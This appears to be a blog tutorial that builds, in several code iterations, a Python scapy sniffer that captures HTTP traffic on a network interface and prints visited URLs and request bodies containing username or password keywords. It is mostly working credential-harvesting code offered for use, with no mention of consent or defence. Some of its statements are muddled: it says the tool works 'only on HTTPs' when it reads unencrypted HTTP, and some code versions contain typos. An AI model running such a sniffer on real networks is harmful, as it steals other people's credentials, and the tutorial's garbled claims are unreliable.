WRITING A PACKET_SNIFFER

2 min read
0

 PACKET_SNIFFER

CODE: BASE#1

  1. #!/usr/bin/env python

  3. import scapy.all as scapy

  5. def sniff(interface):
  6.     scapy.sniff(iface=interface, store=False, prc=process_sniffed_packet)

  8. def process_sniffed_packet(packet):
  9.     print(packet)

  11. sniff("eth0")

WITH DETAILS!
WE USE 3RD PARTY MODULE CUZ SCAPY DOESNOT USE HTTPS..
TO INSTALL 3RD PARTY MODULE: RUN:-ANY OF THE BELOW
  • pip install scapy_http
  • pip install layer.http
IF YOU FACE TRACE-BACK ERROR REINSTALL KALI!!
NOTE THIS PROGRAMME WILL ONLY WORK ON HTTPs/

#EXTRACTING DATA FROM A SPECIFIC LAYER

CODE: BASE#2

  1. #!/usr/bin/env python

  3. import scapy.all as scapy
  4. from scapy.layers import http

  6. def sniff(interface):
  7.     scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

  9. def process_sniffed_packet(packet):
  10.     if packet.haslayer(http.HTTPRepuest):
  11.       print(packet.show())

  13. sniff("eth0")

we put packet. show = to see/find the layers/fields in details
so we can put in our programing
#EXTRACTING OUR DESIRE OUTPUT!

EXAMPLE: EXTRACTING just LOGIN/USERNAME

CODE: MODEFIED#1
  1. #!/usr/bin/env python

  3. import scapy.all as scapy
  4. from scapy_http import http

  6. def sniff(interface):

  8.     scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

  10. def process_sniffed_packet(packet):

  12.     if packet.haslayer(http.HTTPRequest):
  13.         if packet.haslayer(scapy.Raw):
  14.             print(packet[scapy.Raw].load)

  16. sniff("eth0")

AN ISSUE:

If we wana sniff any further we get too many data again in the FIELD/LAYER[RAW/LOAD] itself hence we cannot find our desire stuffs

so to avoid this we use keywords 

#USING KEYWORDS!!

[FINDING SUB-STRING CONTAIN IN A BIG STRING]

CODE: MODEFIED#2

#!/usr/bin/env python

import scapy.all as scapy
from scapy_http import http

def sniff(interface):

    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(http.HTTPRequest):
        if packet.haslayer(scapy.Raw):
            load = packet[scapy.Raw].load
            keywords = ["username", "userName", "login", "password", "pass"]
            for keyword in keywords:
                if keyword in load:
                   print(load)
                   break

sniff("eth0")

#EXTRACTING URLs!!

we use print(packet.show()) to find the field/layer in which the URLs is in...


CODE: MODEFIED#3

  1. #!/usr/bin/env python

  3. import scapy.all as scapy
  4. from scapy_http import http

  6. def sniff(interface):
  7.     scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

  9. def process_sniffed_packet(packet):

  11.     if packet.haslayer(http.HTTPRequest):
  12.         url = packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
  13.         print(url)

  15.         if packet.haslayer(scapy.Raw):
  16.             load = packet[scapy.Raw].load
  17.             keywords = ["username", "userName", "login", "password", "pass"]
  18.             for keyword in keywords:
  19.                 if keyword in load:
  20.                    print(load)
  21.                    break

  23. sniff("eth0")

CODE: MODEFIED#4[Applying more functions]

  1. #!/usr/bin/env python

  3. import scapy.all as scapy
  4. from scapy_http import http

  6. def sniff(interface):
  7.     scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

  9. def get_url (packet):
  10.     return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path

  12. def get_login_info(packet):
  13.     if packet.haslayer(scapy.Raw):
  14.         load = packet[scapy.Raw].load
  15.         keywords = ["username", "userName", "login", "password", "pass"]
  16.         for keyword in keywords:
  17.             if keyword in load:
  18.                 return load


  21. def process_sniffed_packet(packet):
  22.     if packet.haslayer(http.HTTPRequest):
  23.         url = get_url(packet)
  24.         print("[+] HTTP Request >>" + url)
  25.         login_info = get_login_info(packet)
  26.         if login_info:
  27.             print("\n\n[+] Possible username/password >" + login_info + "\n\n")


  30. sniff("eth0")

CODE: MODEFIED#4-COMPATIBLE WITH PYTHON-3

  1. #!/usr/bin/env python

  3. import scapy.all as scapy
  4. from scapy_http import http

  6. def sniff(interface):
  7.     scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

  9. def get_url (packet):
  10.     return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path

  12. def get_login_info(packet):
  13.     if packet.haslayer(scapy.Raw):
  14.         load = str(packet[scapy.Raw].load)
  15.         keywords = ["username", "userName", "login", "password", "pass"]
  16.         for keyword in keywords:
  17.             if keyword in load:
  18.                 return load


  21. def process_sniffed_packet(packet):
  22.     if packet.haslayer(http.HTTPRequest):
  23.         url = get_url(packet)
  24.         print("[+] HTTP Request >>" + url.decode())
  25.         login_info = get_login_info(packet)
  26.         if login_info:
  27.             print("\n\n[+] Possible username/password >" + login_info + "\n\n")


  30. sniff("eth0")



4.94 / 169 rates

Post a Comment

If you have any doubts, please let me know

Previous Post Next Post